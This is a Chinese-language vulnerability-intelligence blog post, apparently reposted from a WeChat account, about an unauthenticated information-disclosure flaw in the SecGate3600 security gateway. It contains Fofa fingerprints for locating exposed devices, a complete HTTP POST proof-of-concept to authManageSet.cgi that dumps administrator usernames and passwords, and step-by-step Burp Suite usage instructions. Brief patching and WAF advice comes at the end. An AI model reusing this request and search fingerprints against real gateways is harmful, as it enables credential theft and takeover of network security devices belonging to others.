漏洞情报-某神SecGate3600 authManageSet.cgi信息泄露漏洞

admin

104707
文章

87
评论

2024年1月2日10:34:00评论59 views字数 1144阅读3分48秒阅读模式

漏洞情报-某神SecGate3600 authManageSet.cgi信息泄露漏洞

网神SecGate3600 authManageSet.cgi信息泄露漏洞

漏洞详情：

SecGate3600是网神信息技术(北京)股份有限公司旗下一款安全网关产品，由于网神SecGate 3600 authManageSet.cgi接口存在敏感信息泄露漏洞，未授权得攻击者可以通过此漏洞获取控制台管理员用户名密码等敏感信息，可登录控制整个后台。

影响范围

SecGate3600-A1500 v3.6.6.0(v2.64.02)

Fofa

body="sec_gate_image/login_02.gif"
fid="ldb0WVBlAgZloMw9AAge0A=="

漏洞利用

poc
POST /cgi-bin/authUser/authManageSet.cgi HTTP/1.1Host: your-ipContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateConnection: close type=getAllUsers&_search=false&nd=1645000391264&rows=-1&page=1&sidx=&sord=asc

使用方法：

1、使用浏览器访问目标系统，并使用BurpSuite进行拦截抓包；

2、将BurpSuite拦截的GET请求包转换成POST包，并添加

/cgi-bin/authUser/authManageSet.cgi

接口地址，请求内容为：

type=getAllUsers&_search=false&nd=1645000391264&rows=-1&page=1&sidx=&sord=asc

其他内容不修改

漏洞情报-某神SecGate3600 authManageSet.cgi信息泄露漏洞

3、当请求结果状态码返回为200后，就能从返回结果获取到登录账号密码信息，并且使用获取的账号密码可登录后台。

漏洞修复建议

目前厂商已发布安全版本，请联系厂商进行漏洞修复或通过以下方法进行防范漏洞：

1 将authManageSet.cgi接口特征添加WAF规则，进行网络攻击行为拦截；

2 取消互联网映射或设置指定IP访问。

感谢各位大佬们关注-不秃头的安全，后续会坚持更新渗透漏洞思路分享、安全测试、好用工具分享以及挖掘SRC思路等文章，同时会组织不定期抽奖，希望能得到各位的关注与支持。

原文始发于微信公众号（不秃头的安全）：漏洞情报-某神SecGate3600 authManageSet.cgi信息泄露漏洞

左青龙
微信扫一扫

右白虎
微信扫一扫

漏洞情报-某神SecGate3600 authManageSet.cgi信息泄露漏洞

【漏洞预警/复现】广州安*通信技术有限公司secnet安网智能AC管理系统信息泄露漏洞复现 CNVD-2022-86158

漏洞预警 | Ruvar OA SQL注入漏洞

漏洞预警 | User Meta敏感信息泄露漏洞

漏洞预警 | 联软安全数据交换系统任意文件读取漏洞

Typora远程代码执行漏洞（CVE-2023-2317）

CVE-2024-34220

MeterSphere | CVE-2023-38494

漏洞复现 JeecgBoot SSTI RCE漏洞

漏洞预警 | Apache Commons Compress拒绝服务漏洞

CVE-2023-38146（ThemeBleed）的概念验证 POC

发表评论

在线咨询

微信